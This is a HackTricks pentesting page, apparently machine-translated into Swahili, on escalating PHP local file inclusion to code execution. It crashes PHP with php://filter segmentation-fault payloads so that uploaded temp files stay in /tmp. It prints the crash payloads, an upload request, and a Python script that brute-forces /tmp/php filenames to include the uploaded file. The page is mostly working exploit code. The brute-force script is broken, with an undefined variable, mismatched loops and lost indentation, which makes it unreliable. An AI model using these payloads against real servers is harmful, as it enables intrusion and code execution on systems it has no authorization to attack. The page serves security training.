hacktricks/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md

LFI2RCE kupitia Kosa la Segmentation

{% hint style="success" %} Jifunze & zoezi Udukuzi wa AWS:Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE)
Jifunze & zoezi Udukuzi wa GCP: Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)

Support HackTricks

• Angalia mpango wa michango!
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

{% endhint %}

Kulingana na maandishi https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/ (sehemu ya pili) na https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view, mizigo ifuatayo ilisababisha kosa la segmentation katika PHP:

// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");

// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");

Unapaswa kujua kwamba ikiwa tuma ombi la POST lenye faili, PHP itaunda faili ya muda mfupi katika /tmp/php<kitu> yenye maudhui ya faili hiyo. Faili hii ita futwa moja kwa moja mara ombi litakapoprocess.

Ikiwa unapata LFI na unafanikiwa kuzindua kosa la ugonjwa wa sehemu katika PHP, faili ya muda mfupi haitafutwa kamwe. Kwa hivyo, unaweza kuitafuta kwa kutumia udhaifu wa LFI mpaka uipate na kutekeleza nambari ya kupendelea.

Unaweza kutumia picha ya docker https://hub.docker.com/r/easyengine/php7.0 kwa majaribio.

# upload file with segmentation fault
import requests
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
files = {'file': open('la.php','rb')}
response = requests.post(url, files=files)


# Search for the file (improve this with threads)
import requests
import string
import threading

charset = string.ascii_letters + string.digits

host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)


def bruteforce(charset):
for i in charset:
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
filename = prefix + i + j + k
url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
print url
response = requests.get(url)
if 'spyd3r' in response.content:
print "[+] Include success!"
return True


def main():
bruteforce(charset)

if __name__ == "__main__":
main()

{% hint style="success" %} Jifunze na zoea AWS Hacking:Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE)
Jifunze na zoea GCP Hacking: Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

{% endhint %}